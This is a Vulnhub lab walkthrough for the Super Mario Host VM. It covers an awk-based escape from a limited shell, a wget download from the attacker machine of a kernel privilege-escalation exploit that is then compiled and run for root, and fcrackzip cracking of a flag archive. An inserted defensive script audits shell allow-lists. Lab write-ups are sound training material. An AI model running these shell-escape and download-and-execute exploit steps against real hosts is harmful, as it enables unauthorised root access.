Vulnhub Super Mario Host: 1.0.1 Walkthrough Part 2

It has been a long time since the first part of this host from Vulnhub. I apologize; I simply forgot about it. With this post, I want to finish the walkthrough of this host. The first part ended with the password of Luigi. The next obvious step is to connect to the host over ssh using the found password.

Escape the limited shell

Once connected to the host as Luigi, you will find yourself in a limited shell.

luigi@192.168.56.101's password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
luigi:~$ ?
awk  cat  cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo  vim

awk is on the list of allowed commands, and because awk can run other commands, it can also be used to launch a shell.

luigi:~$ awk 'BEGIN{system("/bin/bash")}'
luigi@supermariohost:~$ whoami
luigi

With that, we have successfully escaped the limited shell. The next step is to examine the host and escalate the privileges.
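Seen from the administrator's side, the escape works because the allow-list contains a program that can start other programs. The following audit is an added example, not part of the original walkthrough or of the limited shell's own code; the SHELL_CAPABLE table and the config-style sample line are assumptions, and the table is not exhaustive.

```python
import ast
import re

# Assumption: a small, non-exhaustive set of programs that can start other
# programs. Extend it from your own review before relying on it.
SHELL_CAPABLE = {
    "awk": "system() runs arbitrary commands",
    "vim": "editor can run external commands",
    "vi": "editor can run external commands",
    "less": "pager can run external commands",
    "find": "can execute other programs",
    "python": "general-purpose interpreter",
    "perl": "general-purpose interpreter",
}

def parse_allowed(text):
    """Return allowed command names from either supported input form.

    Accepts the whitespace-separated list printed by the '?' command, or a
    config-style line such as: allowed : ['ls', 'awk'].
    """
    m = re.search(r"allowed\s*[:=]\s*(\[.*?\])", text, re.S)
    if m:
        return [str(c) for c in ast.literal_eval(m.group(1))]
    return text.split()

def audit(text):
    """Map each risky allowed command to the reason it is risky."""
    findings = {}
    for cmd in parse_allowed(text):
        parts = cmd.split()
        if not parts:
            continue  # skip empty entries in a config list
        name = parts[0].rsplit("/", 1)[-1]  # '/usr/bin/awk -f' -> 'awk'
        if name in SHELL_CAPABLE:
            findings[name] = SHELL_CAPABLE[name]
    return findings

# Allowed list exactly as printed in the session above.
HELP_OUTPUT = "awk  cat  cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo  vim"
# Constructed config-style sample, not taken from the target host.
CONF_SAMPLE = "allowed : ['ls', 'echo', 'cd', '/usr/bin/awk']"

if __name__ == "__main__":
    for label, sample in (("help output", HELP_OUTPUT), ("config sample", CONF_SAMPLE)):
        for name, why in sorted(audit(sample).items()):
            print(f"{label}: '{name}' defeats the restriction ({why})")
```

Any entry it reports should be removed from the allow-list or replaced with a wrapper that cannot start other programs.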

Privilege Escalation

Enumerating the system, its files and the versions of its services shows that the installed kernel is outdated and that there are exploits available for it (https://www.exploit-db.com/exploits/37292/). Compiling and running it gives you a root shell.

luigi@supermariohost:/tmp$ uname -a
Linux supermariohost 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
luigi@supermariohost:/tmp$ wget http://192.168.56.102/overlay.c
--2018-08-25 08:18:13--  http://192.168.56.102/overlay.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) 
Saving to: ‘overlay.c’

100%[=================================================>] 5,119       --.-K/s   in 0s      

2018-08-25 08:18:13 (555 MB/s) - ‘overlay.c’ saved [5119/5119]

luigi@supermariohost:/tmp$ gcc overlay.c -o overlay
luigi@supermariohost:/tmp$ chmod +x overlay
luigi@supermariohost:/tmp$ ./overlay 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),112(lshell),1001(luigi)

Get the Flag

In the root folder you will find a flag.zip file. This file is password protected. To find the password, I used the tool fcrackzip and the rockyou.txt wordlist.

# fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt flag.zip 
PASSWORD FOUND!!!!: pw == ilovepeach
# unzip flag.zip 
Archive:  flag.zip
[flag.zip] flag.txt password: 
  inflating: flag.txt
# cat flag.txt 
Well done :D If you reached this it means you got root, congratulations.
Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!
								
mr_h4sh

I got root successfully. It seems that it is not over yet. However, I will end this part here and might publish the rest later. Hope you got something from this walkthrough. If you have any questions, leave a comment below.

Cheers
